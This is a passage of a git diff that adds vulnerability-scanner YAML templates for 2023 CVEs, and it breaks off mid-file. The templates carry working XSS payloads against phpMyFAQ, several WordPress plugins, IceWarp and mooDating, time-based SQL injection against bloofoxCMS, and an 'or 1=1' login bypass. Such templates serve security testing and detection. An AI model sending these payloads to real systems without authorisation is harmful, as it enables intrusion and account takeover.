+ - 'contains(body_2, "re not allowed to view")' + - 'contains(body_2, "")' + condition: and diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml new file mode 100644 index 0000000000..8b3c332aa6 --- /dev/null +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-1880 + +info: + name: Phpmyfaq v3.1.11 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized. + remediation: Fixed in 3.1.12 Version. + reference: + - https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e + - https://nvd.nist.gov/vuln/detail/CVE-2023-1880 + - https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"phpmyfaq" + tags: cve,cve2023,xss,phpmyfaq + +http: + - method: GET + path: + - "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "phpmyfaq") && contains(body, "")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml new file mode 100644 index 0000000000..76577c6b60 --- /dev/null +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-2009 + +info: + name: Pretty Url <= 1.5.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + reference: + - https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f + - https://nvd.nist.gov/vuln/detail/CVE-2023-2009 + - https://wordpress.org/plugins/pretty-url/ + metadata: + verified: true + max-request: 3 + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss + + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log=((username))&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=prettyurls HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin.php?page=prettyurls HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword= + + redirects: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "prettyurls")' + condition: and + + extractors: + - type: regex + internal: true + name: nonce + part: body + group: 1 + regex: + - 'name="_wpnonce" value="([0-9a-z]+)" />' \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml new file mode 100644 index 0000000000..8f8ad9e220 --- /dev/null +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2779 + +info: + name: Super Socializer < 7.13.52 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 7.13.52 + reference: + - https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5 + - https://nvd.nist.gov/vuln/detail/CVE-2023-2779 + - https://wordpress.org/plugins/super-socializer/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/super-socializer/" + tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "facebook_urls")' + condition: and diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml new file mode 100644 index 0000000000..c7a29cad2b --- /dev/null +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-27922 + +info: + name: Newsletter < 7.6.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators + reference: + - https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c + - https://nvd.nist.gov/vuln/detail/CVE-2023-27922 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/newsletter/" + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "text/html")' + - 'contains(tolower(body_2), "_newsletter_")' + - 'contains(body_2, ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml new file mode 100644 index 0000000000..17242538ee --- /dev/null +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -0,0 +1,54 @@ +id: CVE-2023-29439 + +info: + name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions. + reference: + - https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve + - https://wordpress.org/plugins/foogallery/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-29439 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-29439 + cwe-id: CWE-79 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/foogallery/" + max-request: 2 + tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'data-gallery_id="\">"' + - 'foogallery-image-edit-modal' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml new file mode 100644 index 0000000000..df9825d672 --- /dev/null +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30868 + +info: + name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. + reference: + - https://www.exploit-db.com/exploits/51507 + - https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30868 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-30868 + cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml new file mode 100644 index 0000000000..1bb171133a --- /dev/null +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-3219 + +info: + name: EventON Lite < 2.1.2 - Arbitrary File Download + author: r3Y3r53 + severity: medium + description: | + The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors + to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post. + remediation: Fixed in version 2.1.2 + reference: + - https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd + - https://nvd.nist.gov/vuln/detail/CVE-2023-3219 + - https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html + - https://wordpress.org/plugins/eventon-lite/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/eventon-lite/" + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "BEGIN:VCALENDAR" + - "END:VCALENDAR" + condition: and + + - type: word + part: header + words: + - "text/Calendar" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml new file mode 100644 index 0000000000..84f1e69061 --- /dev/null +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-33584 + +info: + name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass + author: r3Y3r53 + severity: critical + description: | + Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. + reference: + - https://www.exploit-db.com/exploits/51501 + - https://nvd.nist.gov/vuln/detail/CVE-2023-33584 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-33584 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2023,sqli,exploitdb,unauth,enrollment + +http: + - raw: + - | + POST /enrollment/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username='+or+1%3D1+%23&password={{randstr}} + + - | + GET /enrollment/index.php?page=home HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml new file mode 100644 index 0000000000..374ede29be --- /dev/null +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-34751 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34751 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34751 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml new file mode 100644 index 0000000000..fa140566f1 --- /dev/null +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-34752 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34752 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34752 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml new file mode 100644 index 0000000000..28649f89e9 --- /dev/null +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-34753 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34753 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34753 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml new file mode 100644 index 0000000000..1fe53e8b07 --- /dev/null +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-34755 + +info: + name: bloofoxCMS v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit. + reference: + - https://www.bloofox.com + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2023-34755 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34755 + cwe-id: CWE-89 + metadata: + verified: "true" + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=user&action=edit HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - contains(header_2, "text/html") + - contains(body_2, 'bloofoxCMS Admincenter') + condition: and diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml new file mode 100644 index 0000000000..f37ad8aba8 --- /dev/null +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-34756 + +info: + name: Bloofox v0.5.2.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit. + reference: + - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability + - https://www.bloofox.com + - https://nvd.nist.gov/vuln/detail/CVE-2023-34756 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34756 + cwe-id: CWE-89 + metadata: + verified: true + fofa-query: "Powered by bloofoxCMS" + max-request: 2 + tags: cve,cve2023,sqli,bloofox,authenticated + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + - | + @timeout: 10s + POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body_2, 'Admincenter') + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml new file mode 100644 index 0000000000..48ba7147df --- /dev/null +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-36306 + +info: + name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php + reference: + - https://www.exploit-db.com/exploits/51643 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36306 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36306 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer + +http: + - method: GET + path: + - "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, ">") && contains(body, "Adiscon LogAnalyzer")' + condition: and diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 9ceb2a0c1a..94f7b3c7c9 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -1,16 +1,14 @@ id: CVE-2023-37728 info: - name: IceWarp Webmail Server - Cross-Site Scripting - author: technicaljunkie + name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting + author: technicaljunkie,r3Y3r53 severity: medium description: | - IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter. + Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter. reference: + - https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311 - https://nvd.nist.gov/vuln/detail/CVE-2023-37728 - - https://medium.com/@ayush29/cve-2023-37728-6dfb7586311 - - http://icearp.com - - http://icewarp.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -20,32 +18,23 @@ info: epss-percentile: 0.18493 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: + max-request: 2 verified: true - max-request: 1 - vendor: icewarp - product: icewarp - shodan-query: title:"icewarp" - tags: cve,cve2023,xss,icewarp + shodan-query: http.favicon.hash:2144485375 + tags: cve,cve2023,icearp,icewarp,xss http: - method: GET path: - - '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27' + - "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27" + - "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27" - matchers-condition: and + stop-at-first-match: true matchers: - - type: word - part: body - words: - - '><' - - 'IceWarp' + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")' + - 'contains(body, "")' condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml new file mode 100644 index 0000000000..01ac83819e --- /dev/null +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-37979 + +info: + name: Ninja Forms < 3.6.26 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin + remediation: Fixed in version 3.6.26 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-37979 + - https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348 + - https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-37979 + cwe-id: CWE-79 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/ninja-forms/" + tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "import_form_template")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml new file mode 100644 index 0000000000..25fbdd4e8e --- /dev/null +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-3843 +info: + name: mooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly. + reference: + - https://www.exploit-db.com/exploits/51628 + - https://nvd.nist.gov/vuln/detail/CVE-2023-3843 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3843 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,exploitdb,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains(body, ">w71ch") && contains(body, "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml new file mode 100644 index 0000000000..130b0fe3b1 --- /dev/null +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-3844 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3844 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3844 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">r5c3m", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml new file mode 100644 index 0000000000..579c1952ac --- /dev/null +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-3845 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3845 + classification: + cvss-metrics: 